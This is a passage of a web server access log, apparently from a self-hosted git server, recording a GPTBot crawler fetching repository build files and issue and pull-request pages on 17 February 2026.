74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11382] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:18:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11384] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11383] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11288] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11354] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16072] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11746] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11668] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11745] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16036] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16071] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:18:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12536] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13299] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13769] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" +[17/Feb/2026:18:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:32:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:32:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:32:13 +0000] - 200 200 - GET https 